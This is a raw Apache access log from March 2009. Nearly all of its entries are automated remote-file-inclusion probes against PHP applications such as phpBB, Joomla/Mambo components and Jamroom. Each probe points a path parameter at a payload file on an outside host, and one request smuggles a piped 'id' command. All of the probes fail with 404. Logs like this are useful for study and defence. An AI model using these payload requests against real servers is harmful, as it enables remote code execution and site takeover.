72.232.182.162 - - [22/Mar/2009:11:56:32 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://nuestroenlace.com/photos/id.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.823"
72.232.182.162 - - [22/Mar/2009:11:56:33 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://nuestroenlace.com/photos/id.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.823"
64.34.177.190 - - [22/Mar/2009:12:00:19 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanctamaria-aarschot.be/smarts/osy2.txt%0D?? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
64.34.177.190 - - [22/Mar/2009:12:00:19 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanctamaria-aarschot.be/smarts/osy2.txt%0D?? HTTP/1.1" 404 353 "-""libwww-perl/5.803"
78.111.71.6 - - [22/Mar/2009:12:02:20 -0500] "GET /logs//malaysiancubprix.com//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
78.111.71.6 - - [22/Mar/2009:12:02:20 -0500] "GET //malaysiancubprix.com//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
78.111.71.6 - - [22/Mar/2009:12:02:23 -0500] "GET /logs//malaysiancubprix.com//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
78.111.71.6 - - [22/Mar/2009:12:02:23 -0500] "GET //malaysiancubprix.com//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
66.103.131.81 - - [22/Mar/2009:12:02:31 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
66.103.131.81 - - [22/Mar/2009:12:02:32 -0500] "GET /lostpasswd.php?env[include_prefix]=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
66.103.131.81 - - [22/Mar/2009:12:02:39 -0500] "GET /logs/access_log.1230768000/lostpasswd.php?env[include_prefix]=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.103.131.81 - - [22/Mar/2009:12:02:40 -0500] "GET /logs/access_log.1235952000/lostpasswd.php?env[include_prefix]=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
62.193.225.191 - - [22/Mar/2009:12:03:12 -0500] "GET /logs//malaysiancubprix.com//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 354 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:12:03:12 -0500] "GET //malaysiancubprix.com//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:12:03:17 -0500] "GET /logs//malaysiancubprix.com//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 354 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:12:03:18 -0500] "GET //malaysiancubprix.com//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.65"
64.34.177.190 - - [22/Mar/2009:12:04:08 -0500] "GET /logs//malaysiancubprix.com//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 354 "-""libwww-perl/5.803"
64.34.177.190 - - [22/Mar/2009:12:04:09 -0500] "GET //malaysiancubprix.com//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
62.193.225.191 - - [22/Mar/2009:12:05:18 -0500] "GET /logs//malaysiancubprix.com//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 354 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:12:05:19 -0500] "GET //malaysiancubprix.com//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.65"
212.112.227.88 - - [22/Mar/2009:12:06:57 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
212.112.227.88 - - [22/Mar/2009:12:06:57 -0500] "GET //include/bbs.lib.inc.php?site_path=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
94.23.17.145 - - [22/Mar/2009:12:09:36 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yes-tech.co.kr//technote7/data/theme/idfx1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
94.23.17.145 - - [22/Mar/2009:12:09:36 -0500] "GET /logs/access_log.1233619200/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yes-tech.co.kr//technote7/data/theme/idfx1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
94.23.17.145 - - [22/Mar/2009:12:09:36 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yes-tech.co.kr//technote7/data/theme/idfx1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
94.23.17.145 - - [22/Mar/2009:12:10:41 -0500] "GET /logs/access_log.1235692800/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yes-tech.co.kr//technote7/data/theme/idfx1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
72.47.234.27 - - [22/Mar/2009:12:14:27 -0500] "GET /logs//administrator/components/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.thebasketgourmet.com/store/skin1/modules/Upselling_Products/orders.tpl? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
72.47.234.27 - - [22/Mar/2009:12:14:27 -0500] "GET //administrator/components/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.thebasketgourmet.com/store/skin1/modules/Upselling_Products/orders.tpl? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
65.55.208.131 - - [22/Mar/2009:12:16:58 -0500] "GET /?D=A HTTP/1.1" 200 3245 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
88.191.89.65 - - [22/Mar/2009:12:17:44 -0500] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://members.mywave.at/m206111aa/cms/administrator/components/com_mkpostman/includes/v4id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
88.191.89.65 - - [22/Mar/2009:12:17:44 -0500] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://members.mywave.at/m206111aa/cms/administrator/components/com_mkpostman/includes/v4id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
80.68.61.100 - - [22/Mar/2009:12:18:52 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
80.68.61.100 - - [22/Mar/2009:12:18:53 -0500] "GET //include/bbs.lib.inc.php?site_path=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
82.179.197.134 - - [22/Mar/2009:12:19:02 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:12:19:02 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:12:19:02 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:12:19:07 -0500] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
76.76.31.15 - - [22/Mar/2009:12:19:26 -0500] "GET /errors.php?error=image;image=%7Cid%7C;type=text/plain HTTP/1.1" 404 293 "-""libwww-perl/5.808"
76.76.31.15 - - [22/Mar/2009:12:19:26 -0500] "GET /logs/errors.php?error=image;image=%7Cid%7C;type=text/plain HTTP/1.1" 404 298 "-""libwww-perl/5.808"
82.179.197.134 - - [22/Mar/2009:12:20:03 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:12:20:03 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:12:20:03 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:12:20:09 -0500] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:12:20:15 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:12:20:15 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:12:20:15 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:12:20:20 -0500] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
218.38.243.71 - - [22/Mar/2009:12:21:10 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
218.38.243.71 - - [22/Mar/2009:12:21:10 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
218.38.243.71 - - [22/Mar/2009:12:21:10 -0500] "GET /logs/access_log.1235433600//include/admin.lib.inc.php?site_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.38.243.71 - - [22/Mar/2009:12:21:24 -0500] "GET /logs/access_log.1236124800//include/admin.lib.inc.php?site_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.38.243.71 - - [22/Mar/2009:12:23:20 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
218.38.243.71 - - [22/Mar/2009:12:23:26 -0500] "GET /logs/access_log.1235433600//include/admin.lib.inc.php?site_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.38.243.71 - - [22/Mar/2009:12:23:26 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
72.30.142.178 - - [22/Mar/2009:12:23:44 -0500] "GET /robots.txt HTTP/1.0" 404 281 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.178 - - [22/Mar/2009:12:23:44 -0500] "GET /logs/access_log.1228608000 HTTP/1.0" 200 12125 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.38.243.71 - - [22/Mar/2009:12:23:50 -0500] "GET /logs/access_log.1236124800//include/admin.lib.inc.php?site_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
132.239.8.103 - - [22/Mar/2009:12:29:38 -0500] "GET /logs//maillist//install/install3.php?database=none&cabsolute_path=http://backup.nscf-n.or.kr/board/data/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
132.239.8.103 - - [22/Mar/2009:12:29:38 -0500] "GET //maillist//install/install3.php?database=none&cabsolute_path=http://backup.nscf-n.or.kr/board/data/fx29id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
132.239.8.103 - - [22/Mar/2009:12:29:38 -0500] "GET /logs/access_log.1233964800//maillist//install/install3.php?database=none&cabsolute_path=http://backup.nscf-n.or.kr/board/data/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.106.254.18 - - [22/Mar/2009:12:29:57 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yes-tech.co.kr//technote7/data/theme/idfx1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
218.106.254.18 - - [22/Mar/2009:12:29:57 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yes-tech.co.kr//technote7/data/theme/idfx1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
218.106.254.18 - - [22/Mar/2009:12:29:57 -0500] "GET /logs/access_log.1233619200/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yes-tech.co.kr//technote7/data/theme/idfx1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
218.106.254.18 - - [22/Mar/2009:12:32:27 -0500] "GET /logs/access_log.1235692800/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yes-tech.co.kr//technote7/data/theme/idfx1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:12:32:30 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:12:32:30 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:12:32:30 -0500] "GET /logs/access_log.1230163200/lostpasswd.php?env[include_prefix]=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:12:32:47 -0500] "GET /logs/access_log.1236038400/lostpasswd.php?env[include_prefix]=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:12:37:29 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:12:37:29 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:12:37:29 -0500] "GET /logs/access_log.1230163200/lostpasswd.php?env[include_prefix]=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:12:37:36 -0500] "GET /logs/access_log.1230163200/lostpasswd.php?env[include_prefix]=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:12:37:36 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:12:37:36 -0500] "GET /lostpasswd.php?env[include_prefix]=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
69.64.34.249 - - [22/Mar/2009:12:37:45 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanctamaria-aarschot.be/smarts/osy2.txt%0D?? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
69.64.34.249 - - [22/Mar/2009:12:37:45 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanctamaria-aarschot.be/smarts/osy2.txt%0D?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
82.179.197.134 - - [22/Mar/2009:12:37:49 -0500] "GET /logs/access_log.1236038400/lostpasswd.php?env[include_prefix]=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:12:37:55 -0500] "GET /logs/access_log.1236038400/lostpasswd.php?env[include_prefix]=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
74.55.15.34 - - [22/Mar/2009:12:41:01 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.annuaire-philatelie.com/les_news/backend/idfx1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
74.55.15.34 - - [22/Mar/2009:12:41:01 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.annuaire-philatelie.com/les_news/backend/idfx1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
74.55.15.34 - - [22/Mar/2009:12:41:03 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.annuaire-philatelie.com/les_news/backend/idfx1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
74.55.15.34 - - [22/Mar/2009:12:41:03 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.annuaire-philatelie.com/les_news/backend/idfx1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
74.55.15.34 - - [22/Mar/2009:12:41:03 -0500] "GET /logs/access_log.1235952000/e404.php?DOCUMENT_ROOT=http://www.annuaire-philatelie.com/les_news/backend/idfx1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
74.55.15.34 - - [22/Mar/2009:12:41:05 -0500] "GET /logs/access_log.1235952000/e404.php?DOCUMENT_ROOT=http://www.annuaire-philatelie.com/les_news/backend/idfx1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
74.55.15.34 - - [22/Mar/2009:12:41:42 -0500] "GET /logs/access_log.1235692800/e404.php?DOCUMENT_ROOT=http://www.annuaire-philatelie.com/les_news/backend/idfx1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
74.55.15.34 - - [22/Mar/2009:12:41:46 -0500] "GET /logs/access_log.1235692800/e404.php?DOCUMENT_ROOT=http://www.annuaire-philatelie.com/les_news/backend/idfx1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
196.40.83.75 - - [22/Mar/2009:12:42:35 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://okto.co.kr//zboard/include/v6.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
196.40.83.75 - - [22/Mar/2009:12:42:35 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://okto.co.kr//zboard/include/v6.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
82.179.197.134 - - [22/Mar/2009:12:48:09 -0500] "GET /logs/access_log.1236124800/lostpasswd.php?env[include_prefix]=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:12:50:25 -0500] "GET /logs/access_log.1236124800/lostpasswd.php?env[include_prefix]=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:12:51:21 -0500] "GET /logs/access_log.1236124800/lostpasswd.php?env[include_prefix]=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
80.68.61.100 - - [22/Mar/2009:12:51:44 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
80.68.61.100 - - [22/Mar/2009:12:51:50 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
192.107.41.8 - - [22/Mar/2009:12:58:16 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://english.estatuasdesol.com/images/copyright.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0"
192.107.41.8 - - [22/Mar/2009:12:58:16 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://english.estatuasdesol.com/images/copyright.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
192.107.41.8 - - [22/Mar/2009:12:58:17 -0500] "GET /logs/access_log.1234828800//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://english.estatuasdesol.com/images/copyright.txt???? HTTP/1.1" 404 382 "-""Mozilla/5.0"
192.107.41.8 - - [22/Mar/2009:12:58:18 -0500] "GET /logs/access_log.1234915200//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://english.estatuasdesol.com/images/copyright.txt???? HTTP/1.1" 404 382 "-""Mozilla/5.0"
58.103.130.63 - - [22/Mar/2009:13:02:37 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
58.103.130.63 - - [22/Mar/2009:13:02:37 -0500] "GET /logs/access_log.1233014400/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
58.103.130.63 - - [22/Mar/2009:13:02:37 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
58.103.130.63 - - [22/Mar/2009:13:02:42 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
58.103.130.63 - - [22/Mar/2009:13:03:04 -0500] "GET /logs/access_log.1235865600/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
58.103.130.63 - - [22/Mar/2009:13:03:23 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
58.103.130.63 - - [22/Mar/2009:13:03:23 -0500] "GET /logs/access_log.1233014400/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
58.103.130.63 - - [22/Mar/2009:13:03:38 -0500] "GET /logs/access_log.1235865600/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
62.24.103.66 - - [22/Mar/2009:13:06:19 -0500] "GET /logs//include/write.php?dir=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
62.24.103.66 - - [22/Mar/2009:13:06:19 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.24.103.66 - - [22/Mar/2009:13:06:22 -0500] "GET //include/write.php?dir=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
62.24.103.66 - - [22/Mar/2009:13:12:05 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.193.225.191 - - [22/Mar/2009:13:18:00 -0500] "GET /logs//include/lib.inc.php?site_path=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:13:18:00 -0500] "GET //include/lib.inc.php?site_path=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:13:18:01 -0500] "GET /logs//include/lib.inc.php?site_path=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:13:18:01 -0500] "GET //include/lib.inc.php?site_path=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.65"
78.111.71.6 - - [22/Mar/2009:13:18:47 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
78.111.71.6 - - [22/Mar/2009:13:18:47 -0500] "GET //include/lib.inc.php?site_path=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
78.111.71.6 - - [22/Mar/2009:13:18:49 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
78.111.71.6 - - [22/Mar/2009:13:18:49 -0500] "GET //include/lib.inc.php?site_path=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
62.193.225.191 - - [22/Mar/2009:13:19:36 -0500] "GET /logs//include/lib.inc.php?site_path=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:13:19:37 -0500] "GET //include/lib.inc.php?site_path=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.65"
195.239.110.66 - - [22/Mar/2009:13:20:29 -0500] "GET /logs//bbshop/admin/admin.php?_shop_path=http://www.geocities.com/aardua82/idq.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
195.239.110.66 - - [22/Mar/2009:13:20:30 -0500] "GET //bbshop/admin/admin.php?_shop_path=http://www.geocities.com/aardua82/idq.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
61.110.18.100 - - [22/Mar/2009:13:25:44 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://kbapt.co.kr/bbs/templates/id1.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:13:25:44 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://kbapt.co.kr/bbs/templates/id1.txt????? HTTP/1.1" 404 315 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:13:25:44 -0500] "GET /logs/access_log.1231286400//skin/zero_vote/ask_password.php?dir=http://kbapt.co.kr/bbs/templates/id1.txt????? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:13:25:49 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://kbapt.co.kr/bbs/templates/id1.txt????? HTTP/1.1" 404 315 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:13:25:49 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://kbapt.co.kr/bbs/templates/id1.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
